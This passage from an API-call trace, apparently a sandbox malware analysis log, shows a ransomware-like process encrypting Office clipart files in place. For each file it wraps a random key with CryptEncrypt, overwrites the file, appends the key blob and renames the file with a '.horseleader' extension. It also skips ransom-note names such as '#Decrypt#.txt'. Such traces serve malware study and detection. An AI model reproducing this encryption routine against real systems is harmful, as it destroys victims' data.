ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1e94, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00407_.WMF", cAlternateFileName="")) returned 1 [0253.920] lstrcmpiW (lpString1="DD00407_.WMF", lpString2="Windows") returned -1 [0253.920] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 67 [0253.920] StrStrIW (lpFirst="DD00407_.WMF", lpSrch=".horseleader") returned 0x0 [0253.921] lstrcmpW (lpString1="DD00407_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.921] lstrcmpW (lpString1="DD00407_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.921] lstrlenW (lpString=".testttjffg") returned 11 [0253.921] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.921] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.921] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.921] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.921] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 67 [0253.921] StrStrW (lpFirst="DD00407_.WMF", lpSrch=".txt") returned 0x0 [0253.921] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7828) returned 1 [0253.921] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1e94, lpOverlapped=0x0) returned 1 [0253.923] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe16c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.923] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1e94, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1e94, lpOverlapped=0x0) returned 1 [0253.924] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.924] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.924] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.924] CloseHandle 
(hObject=0x158) returned 1 [0253.924] GetProcessHeap () returned 0x780000 [0253.924] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.924] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF.horseleader") returned 79 [0253.924] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf.horseleader")) returned 1 [0253.925] GetProcessHeap () returned 0x780000 [0253.925] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.925] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d5b650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xa7f0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00413_.WMF", cAlternateFileName="")) returned 1 [0253.925] lstrcmpiW (lpString1="DD00413_.WMF", lpString2="Windows") returned -1 [0253.925] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 67 [0253.925] StrStrIW (lpFirst="DD00413_.WMF", lpSrch=".horseleader") returned 0x0 [0253.925] lstrcmpW (lpString1="DD00413_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.925] lstrcmpW (lpString1="DD00413_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.925] lstrlenW 
(lpString=".testttjffg") returned 11 [0253.925] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.925] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.925] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.925] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.927] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 67 [0253.927] StrStrW (lpFirst="DD00413_.WMF", lpSrch=".txt") returned 0x0 [0253.927] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=42992) returned 1 [0253.927] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.929] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.929] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.930] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 
lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.930] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.930] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.930] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x7f0, lpOverlapped=0x0) returned 1 [0253.930] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff810, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.930] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x7f0, lpOverlapped=0x0) returned 1 [0253.930] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.931] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.931] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.931] CloseHandle (hObject=0x158) returned 1 [0253.931] GetProcessHeap () returned 0x780000 [0253.931] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.931] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF.horseleader") returned 79 [0253.931] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf.horseleader")) returned 1 [0253.932] GetProcessHeap () returned 0x780000 [0253.932] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.932] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xa79c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00414_.WMF", cAlternateFileName="")) returned 1 [0253.932] lstrcmpiW (lpString1="DD00414_.WMF", lpString2="Windows") returned -1 [0253.932] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 67 [0253.932] StrStrIW (lpFirst="DD00414_.WMF", lpSrch=".horseleader") returned 0x0 [0253.932] lstrcmpW (lpString1="DD00414_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.932] lstrcmpW (lpString1="DD00414_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.932] lstrlenW (lpString=".testttjffg") returned 11 [0253.932] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.932] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, 
pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.932] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.932] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.933] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 67 [0253.933] StrStrW (lpFirst="DD00414_.WMF", lpSrch=".txt") returned 0x0 [0253.933] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=42908) returned 1 [0253.933] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.936] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.936] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.936] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.936] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.936] WriteFile (in: hFile=0x158, 
lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.936] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x79c, lpOverlapped=0x0) returned 1 [0253.937] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff864, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.937] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x79c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x79c, lpOverlapped=0x0) returned 1 [0253.937] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.937] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.937] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.937] CloseHandle (hObject=0x158) returned 1 [0253.937] GetProcessHeap () returned 0x780000 [0253.937] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.937] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF.horseleader") returned 79 [0253.937] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft 
office\\clipart\\pub60cor\\dd00414_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf.horseleader")) returned 1 [0253.938] GetProcessHeap () returned 0x780000 [0253.938] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.938] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba4ecd00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xba4ecd00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x2c8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00419_.WMF", cAlternateFileName="")) returned 1 [0253.938] lstrcmpiW (lpString1="DD00419_.WMF", lpString2="Windows") returned -1 [0253.938] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 67 [0253.938] StrStrIW (lpFirst="DD00419_.WMF", lpSrch=".horseleader") returned 0x0 [0253.938] lstrcmpW (lpString1="DD00419_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.938] lstrcmpW (lpString1="DD00419_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.938] lstrlenW (lpString=".testttjffg") returned 11 [0253.938] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.938] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.938] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.938] CreateFileW 
(lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.939] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 67 [0253.939] StrStrW (lpFirst="DD00419_.WMF", lpSrch=".txt") returned 0x0 [0253.939] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=712) returned 1 [0253.939] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2c8, lpOverlapped=0x0) returned 1 [0253.940] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffd38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.940] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2c8, lpOverlapped=0x0) returned 1 [0253.940] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.940] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.940] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.940] CloseHandle (hObject=0x158) returned 1 [0253.940] GetProcessHeap () returned 0x780000 [0253.940] 
RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.941] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF.horseleader") returned 79 [0253.941] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf.horseleader")) returned 1 [0253.945] GetProcessHeap () returned 0x780000 [0253.945] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.945] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb91da000, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb91da000, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x78c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00437_.WMF", cAlternateFileName="")) returned 1 [0253.945] lstrcmpiW (lpString1="DD00437_.WMF", lpString2="Windows") returned -1 [0253.945] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 67 [0253.945] StrStrIW (lpFirst="DD00437_.WMF", lpSrch=".horseleader") returned 0x0 [0253.945] lstrcmpW (lpString1="DD00437_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.945] lstrcmpW (lpString1="DD00437_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.945] lstrlenW (lpString=".testttjffg") returned 11 [0253.945] StrStrW (lpFirst="\\\\?\\C:\\Program 
Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.945] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.945] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.945] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.946] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 67 [0253.946] StrStrW (lpFirst="DD00437_.WMF", lpSrch=".txt") returned 0x0 [0253.946] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1932) returned 1 [0253.946] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x78c, lpOverlapped=0x0) returned 1 [0253.948] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff874, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.948] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x78c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x78c, lpOverlapped=0x0) returned 1 [0253.948] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.948] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | 
out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.948] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.948] CloseHandle (hObject=0x158) returned 1 [0253.948] GetProcessHeap () returned 0x780000 [0253.948] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.948] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF.horseleader") returned 79 [0253.949] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf.horseleader")) returned 1 [0253.949] GetProcessHeap () returned 0x780000 [0253.949] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.949] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, 